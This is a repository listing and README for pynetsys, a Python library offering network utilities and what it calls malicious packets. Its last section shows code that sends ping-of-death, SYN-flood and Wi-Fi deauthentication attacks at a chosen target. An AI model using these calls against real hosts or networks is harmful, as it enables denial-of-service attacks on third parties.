https://github.com/andrvv/pynetsys
pynetsys is a collection of tools and malicious packets.
https://github.com/andrvv/pynetsys
hacking hacking-tools packets python
Last synced: 11 days ago
JSON representation
pynetsys is a collection of tools and malicious packets.
- Host: GitHub
- URL: https://github.com/andrvv/pynetsys
- Owner: ANDRVV
- License: bsd-3-clause
- Created: 2022-07-04T23:25:00.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2022-11-02T14:32:44.000Z (over 3 years ago)
- Last Synced: 2025-02-09T09:46:19.540Z (over 1 year ago)
- Topics: hacking, hacking-tools, packets, python
- Language: Python
- Homepage:
- Size: 34.2 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# PYNETSYS
pynetsys is a collection of tools and malicious packets.
Developed by Andrea Vaccaro from ANDRVV (c) 2022
# Installing
Linux, MacOS = ```pip3 install pynetsys --user```
Windows = ```pip install pynetsys --user```
# Tools
```python
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
----------------
isonline = pynetsys.isOnline("python.org") --> bool
print(isonline)
haswebprotocol = pynetsys.hasWebProtocol("http:\\python.org") --> bool
OR
haswebprotocol = pynetsys.hasWebProtocol("python.org") --> bool
print(haswebprotocol)
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("https:\\python.org") --> bool
OR
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("python.org") --> bool
print(hasSSLwebprotocol)
addwebprotocol = pynetsys.addWebProtocol("python.org") --> str
print(addwebprotocol)
removewebprotocol = pynetsys.removeWebProtocol("https:\\python.org") --> str
OR
removewebprotocol = pynetsys.removeWebProtocol("http:\\python.org") --> str
print(removewebprotocol)
```
# Create malicious packet and send
```python
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
```